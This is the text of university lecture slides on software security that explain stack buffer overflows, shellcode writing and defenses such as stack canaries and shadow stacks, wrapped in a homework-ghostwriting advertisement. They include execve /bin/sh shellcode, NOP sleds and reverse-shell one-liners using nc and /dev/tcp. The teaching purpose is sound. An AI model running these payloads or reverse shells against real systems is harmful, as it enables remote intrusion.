Software Security
(Part #1: Buffer Overflows)
SFL @ TU Dortmund
Copyright By PowCoder代写 加微信 powcoder
Software Security
• Software is written by humans, and thus contains bugs (= errors that cause incorrect outputs or unintended program behavior)
• Bugs may turn into vulnerabilities (= bugs that can be exploited by attackers to perform otherwise-unauthorized actions)
Bug example
int greet_user() {
char username[8];
printf(“Please enter user name: “);
if (fgets(username, 8, stdin) != NULL) {
printf(“Hi, username”);
Vulnerability example
int greet_user() {
char username[8];
printf(“Please enter user name: “);
while ((ch = fgetc(stdin)) != EOF) {
username[i++] = ch;
printf(“Hi, %s”, username);
Bug: Program does not greet the user by their name, but actually prints the constant string “username”)
Vuln.: Program does not check bounds of username buffer, and may store user input out of bounds.
Software Security
• The following three lectures are on software security
• Main overarching questions to study:
• When and why is a program vulnerable, and how can it be exploited? • How can CPUs, compilers or OSes protect against exploitation?
• Focus on C/C++ (et al.) programs for now
• Outlook to “safe” languages at the end of this lecture series • Security of Web applications in dedicated lecture
Hint: The following slides will introduce dozens of small code examples. You can find all of them in a ZIP file in Moodle. Use this opportunity to deepen your knowledge by executing the programs yourself (e.g., in a debugger).
Data Types 101
• Arrays are consecutive elements of the same type • Elements may be integers, pointers, structs, etc.
• Typically aligned in memory without separators
• One- or multidimensional
• Size of arrays is fixed
• Can be resized if full→dynamic array
• Often accompanied with a length variable that indicates current fill level
Arrays (Example)
Assembly code
int arrcomp() {
uint32_t i, sum = 0; uint32_t int_arr[256];
mov ebp,esp
sub esp,0x400 ; 4*0x100B on stack (array)
int_arr[64] = 0x11111111; ; 1st elemnt at ebp-0x400, 65th at ebp-0x300 mov DWORD PTR [ebp-0x300],0x11111111
for (i = 0; i < 256; i++) {
int_arr[i] = i;
xor eax,eax ; variable i
rep: mov DWORD PTR [ebp+eax*4-0x400],eax
add eax,0x1 ;i++
cmp eax,0x100 ; i < 256? jne rep
for (i = 0; i < 256; i++) {
sum += int_arr[i];
return sum;
lea edx,[ebp-0x400] ; edx = &int_arr[0] mov ecx,ebp ; points after end of int_arr xor eax,eax ; sum = 0 (rval)
add eax,DWORD PTR [edx] ; sum+=int_arr[i] add edx,0x4 ; go up (0->1, 1->2)
cmp edx,ecx ; abort if at last element
jne rp2 ; repeat otherwise
Strings (see ex30.asm)
• Strings in C: zero-terminated character array
• C strings are mutable
• Length determined by NULL character: strlen
• Example:
t e s t \n \0 a
• Plenty of other string types exist
Buffer Overflows
Buffer Overflow: Data Corruption (1/2)
Buffer Overflow in fgetc() Call
int do_auth() {
register int i = 0; register char ch;
char username[8];
int auth_successful = 0;
printf(“Please enter user name: “); while ((ch = fgetc(stdin)) != EOF) {
username[i++] = ch;
if (!strcmp(username, “aDm1N”))
auth_successful = 1;
• Buffer overflow
• Out-of-bounds write may corrupt
data (or function pointers)
• Variable-size data types in C do not enforce strict bounds checks
“badguy32\x01” (9 chars)
Overflow data corruption
rbp+0x08 rbp
rbp-0x08
rbp-0x10
rbp+0x08 rbp
rbp-0x08
rbp-0x10 67
auth_successful
username[8]
“badguy32”
Buffer Overflow: Data Corruption (2/2)
• As a defense, compilers can reorder local variables
• Order of variables on stack does not represent the one specified in code
• Store variable types prone to vuln. (e.g., strings, buffers) at higher addresses • Store other variables (e.g., integers) at lower addresses
• Out-of-bound writes affects as few other variables as possible
• Back to example from last side:
• Swapping the order of string buffer and flag variable would solve the data-only attack problem
username[8]
auth_successful
Buffer Overflow: Code Execution (1/2)
• Overwrite return address with pointer to shellcode • Saved rip will blindly be interpreted as
address to return to upon ret
• Attacker can place arbitrary shellcode on stack and execute it (if stack executable)
rbp+0x8 rbp
mystr[512]
Buffer Overflow in fread() Call
int mystr(char *fn) {
char mystr[512];
reg FILE *f = fopen(fn, “rb”); fread(mystr, 1024, 1, f);
return mystr[0];
rbp-0x200 69
Buffer Overflow: Code Execution (2/2)
• Function return will transfer control to shellcode • ret pops saved rip from stack, which
is now attacker-controlled
• If attacker can approximate/guess buffer address, they can specify target
&shellcode
de ad de ad de ad de ad
77 6f 72 6c 64 21 0a 00 ff ff 68 65 6c 6c 6f 20 00 00 00 0f 05 e8 d9 ff 90 b8 3c 00 00 00 bf 2a 24 ba 0d 00 00 00 0f 05 bf 00 00 00 00 48 8b 34 90 eb 22 b8 01 00 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
Assembly Code of Buffer Overflow Example
push rbp mov rbp,rsp
sub rsp,0x200
mov esi,0x4006ac
call 400480
mov rcx,rax
mov edx,0x1
mov esi,0x400
lea rdi,[rbp-0x200] call 400450
movsx eax, BYTE PTR [rbp-0x200]
ret ; pop and jump to &shellcode
mystr’s ret
• Shellcode
• Shellcode is attacker-controlled code that will be jumped to
and will execute after a memory corruption attack
• Shellcode can be seen as the payload of an exploit
• For example: Code placed on an executable stack and returned to
• Shellcode is almost arbitrary code that gets executed by attacker
• Code that was never meant to execute in a program
• Assumption: Attacker can inject shellcode into memory of running process
Introductory Example to Shellcode Writing
• Our goal is to execute a shell
• This goal is also the origin of the name of shellcode: code running a shell • We aim to use sys_execve(fname, argv, envp) system call
Shellcode to spawn /bin/sh
; sys_execve ( char *fname, char *argv[], char *envp[] ) ;rax=59 (rdi, rsi, rdx )
; prepare fname argument
mov rbx, ‘/bin/sh’
; push string in rbx on stack (/bin/sh)
; rsp points to last element on stack ====>
; read pointer to string into rdi
; prepare other two args; basically, pass NULL pointers
mov rsi, 0 mov rdx, 0
; set system call number to execve’s (59) and execute it mov al, 59 ; assume rest of rax was zero before this op syscall
rdi rsp
Stack layout after the two push instructions (in gray: rdi will point to the string after pop)
Shellcode Without Zero Bytes (1/5)
• C string functions assume zero byte (0x00) terminates a string
• Effectively, string functions stop when they encounter a zero byte
• Assume you pass an input string to a vulnerable strcpy(src, dst) call → strcpy() stops on the first zero byte encountered in src
• Solution: Design shellcode to be zero-byte free
• Guarantees that string functions do not terminate prematurely
Shellcode Without Zero Bytes (2/5)
• Revisiting our shell code example shows that it is not zero-byte free
• Two types of zero bytes are immediately visible
• The string “/bin/sh” is zero-terminated (2nd line)
• Moving zero (or other small numbers) into the registers includes zero bytes
Shellcode to spawn /bin/sh
400080: 48 bb 2f 62 69 6e 2f 400087: 73 68 00
40008a: 53
40008b: 54
40008c: 5f
40008d: be 00 00 00 00
400092: ba 00 00 00 00 400097: b0 3b
400099: 0f 05
movabs rbx,0x68732f6e69622f (…)
push rbx push rsp
mov esi,0x0 mov edx,0x0 mov al,0x3b syscall
Shellcode Without Zero Bytes (3/5)
• Zero-byte free number assignments
Assignment Including Zero Bytes
; zeroing a register
mov rax, 0
; store 1-byte integer
mov rax, 47
; store 3-byte integer
xor rax, rax
mov rax, 0x112233
Equivalent but Zero-Free Assignment
; zeroing a register
xor rax, rax
; store 1-byte integer
xor rax, rax mov al, 47
; store 3-byte integer
xor rax, rax mov ax, 0x1122 shl eax, 8
mov al, 0x33
Shellcode Without Zero Bytes (4/5)
• Zero-byte free strings
With Zero Bytes
mov rax, ‘/bin/sh’ push rax
Zero-Free (16 bytes; two qwords on stack)
xor rax, rax push rax
mov rax, ‘//bin/sh’ push rax
Zero-Free (24 bytes; one qword on stack)
mov rax, ‘/bin/shX’
xor rbx, rbx ; rbx = 0
dec rbx ; = 0xffff..ff shr rbx, 8 ; = 0x00ff..ff and rax, rbx ; zero the MSB
; ‘/bin/sh\0’
Shellcode Without Zero Bytes (5/5)
• Everything put together yields zero-free shellcode
Zero-byte Free Shellcode to Spawn /bin/sh (27 bytes)
; prepare fname
xor rax, rax
mov rbx, ‘//bin/sh’
; push string in rbx on stack (/bin/sh)
; rsp points to last element on stack
; read pointer to string into rdi
; prepare other two args: pass NULL pointers
xor rsi, rsi xor rdx, rdx
; set syscall number to execve (59) and execute
mov al, 59 syscall
Shellcode Minimization
• Shellcode might be limited in size
• For example, a buffer overflow just allows to store certain number of bytes • Shellcode typically can be minimized by carefully selecting instructions
• Equivalent instructions (combinations) might exist
Code Not Optimized for Space
; zeroing rax (5B)
mov rax, 0
; zero rax, rdx, rbx (6B)
xor eax, eax xor edx, edx xor ebx, ebx
; store MAXINT in rax (7B)
mov rax, 0xffffffffffffffff
; copy rbx to rax (3B)
mov rax, rbx
Space-Optimized Code
; zeroing rax (2B)
xor eax, eax
; zero by multiply (4B)
xor rbx, rbx mul rbx
; MAXINT = 0 – 1 (5B) xor eax, eax ; rax = 0 dec rax
; copy via stack (2B)
Reverse Shell
• A typical exploitation goal is to have a reverse shell
• Reverse shell connects back to attacker and gives attacker a shell over system
• There are basically two prominent ways to spawn reverse shell
• Option A: start a tool that gives you remote shell built-in
nc -e /bin/sh 10.0.0.1 1234
• Option B: Use a normal shell and redirect stdin/stdout to network bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
• Option B’: If bash features are lacking, redirect stdin/stdout using dup2()
s = socket()
dup2(s, 0);
dup2(s, 1);
connect(s, dst); execve(“/bin/sh”); // spawn shell
// create a socket
// stdout to socket // stdin from socket // connect to attacker
Identifying Shellcode Location
• Stack layout of programs is oftentimes quite deterministic →Running a program multiple times results in equal stack addresses
• Typical approach to identify shellcode location (assumes local access) • Enable crash dumps (e.g., ulimit -c in Linux)
• Overflow buffer and let program crash
• Analyze stack layout in crash dump
• Alternative: Attach debugger to vulnerable program and inspect addresses (warning: this might slightly change the stack layout)
• Sometimes attackers cannot predict exact location of shellcode
• Add nop sled at the beginning of code: several consecutive nop instructions • No matter where entered, nop sled will lead to actual shellcode payload
• Attacker has higher chance to start at the correct position
NOP sled demo
; NOP sled
; … more NOPs nop
nop nop nop
; Actual shellcode goes here
xor eax, eax ; …
Useful Tools for Software Exploitation & Shellcode Writing
•readelf: display ELF file header (sections, segments, symbols) •nasm –f elf64 inp.asm –o bin
• Compile assembly; useful for shellcoders •objdump -d -j “.text” -MIntel bin
• Disassemble code section of program using Intel syntax
•gdb / gdbtui
• Standard Linux console debugger with assembly support
Buffer Overflow Defenses
Stack Canaries (1/2)
• Idea: Place canary (i.e., a “secret” value) on stack before saved rbp/rip • Overflow also has to overwrite the canary in order to overwrite saved rbp/rip
• Inject canary a guard between (unsafe) stack variables and saved pointers • Before entering ret, program checks integrity of canary
• Abort if canary has been manipulated
Canary before attack
Canary after attack
&shellcode
90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
rbp+8 rbp
Before returning from function:
90 90 90 90 90 90 90 90 != CANARY → Abort execution
Stack Canaries (2/2)
• Canary implementation details
• gcc/LLVM store canary in thread-local storage (pointed to by fs register)
Stack Canaries as Implemented by gcc
mov rbp,rsp
mov rax,fs:0x28 mov [rbp-0x8],rax xor eax,eax
mov rdx,[rbp-0x8]
xor rdx,fs:0x28
Random Canaries
• Random canaries use a random value pre-generated at program start • Attacker has to guess (or read/leak) canary to exploit successfully
• One-time-randomization, i.e., canary is shared among functions/threads
• Why not per-function canaries?
• Slow down performance
– Need to generate random canary per function
– Can no longer use single memory location
• Do not give much stronger guarantees
– An attacker who can leak a canary can likely also leak several canaries
Terminator Canaries
• Terminator canaries consist of bytes that terminate C strings • Attacker who aims to overwrite canary has to use these bytes
• Mitigates rip overwrites for several string functions
– scanf(“%s”) – strcpy()
stops at newline character stops at white-space character stops at NULL byte
• Example: 32-bit terminator canary could be 0x00 || ‘\n’ || ‘\r’ || 0xFF
• Limited power
• No randomization, hence only stops string functions (and not, e.g., read()) • gcc falls back to terminator canaries if it cannot find source for randomness
• In practice, randomized and terminator canaries are combined
• gcc’s canaries consist of 6 random and 2 terminator bytes
• Attacker has to overwrite terminator bytes before reaching the random bytes
Limitations of Stack Canaries (1/2)
• Although widely used in practice, stack canaries have limitations
• Little security guarantees if random canary leaks (e.g., memory leak)
– Attacker can overwrite canary with leaked value
– To mitigate this, compilers usually combine random with terminator canaries
• No protection of local variables
– Only saved rbp/rip are protected, local variables can still be overwritten
– Requires careful reordering of local variables
• Only protects against stack-based buffer overflows
– Buffer overflows implicitly overwrite consecutive memory ranges
– Other attacks may overwrite the heap or just specific memory locations on the stack (→string format vulnerabilities, heap overflows, etc.; see later)
Limitations of Stack Canaries (2/2)
• Less protection for auto-forking processes without re-randomization
• Canary can be leaked via blind hacking
• Assume a process forks for every new client connection (e.g., Web server) • Attacker can operate on child process that shares canary with parent
• Crash of child is a side channel to indicate if the guessed canary was wrong
• Idea: Byte-by-byte trial-and-error on canary
• Requires max 256 attempts per byte, i.e., 1024x for 4B and 2048x for 8B canary
Original stack (canary = 7|8|2|3)
Brute-forcing the first canary byte (two crashes, success in 3rd attempt)
BF on 2nd canary byte (success in 2 attempts)
Return Address XORing
• XOR return address with random value in function prologue/epilogue • An attacker can overwrite saved rip, but decryption will clobber its value
• In function prologue: encrypt saved rip
• In function epilogue: decrypt saved rip
• Similar security guarantees, but:
• Even secure if only saved rip is overwritten by attacker (in contrast, canary assumed contiguous overwrite)
• Also susceptible to blind hacking, as value is not re-randomized
Implementation of Return Address XORing
mov rbp, rsp
mov rcx, [xorsecret] xor [rbp+8], rcx xor rcx, rcx
mov rcx, [xorsecret] xor [rbp+8], rcx xor rcx, rcx
Shadow Stack
• Idea of shadow stack: store return instruction pointer (rip) twice
• Function calls store rip on main stack, but attackers might overwrite stack
• Shadow stack: Instrument function calls to store rip in a second, secret location • Before returning, check if rip shadow stack matches rip on normal stack
• Two implementation alternatives
– Full shadow stack copies memory layout of normal stack: fast, but large memory footprint
– Dense shadow stack is consecutive array of return addresses: less memory, but slower
Normal Stack
Full Shadow Stack
Dense Shadow Stack
sub [shad_sp], 8 mov rcx, [rbp+8] mov [shad_sp], rcx ; …
saved ripn-1
saved rbpn-1
local varsn-1
saved ripn
saved ripn-1
saved ripn
Dense Shadow Stack
saved ripn-1
saved ripn
程序代写 CS代考 加微信: powcoder QQ: 1823890830 Email: powcoder@163.com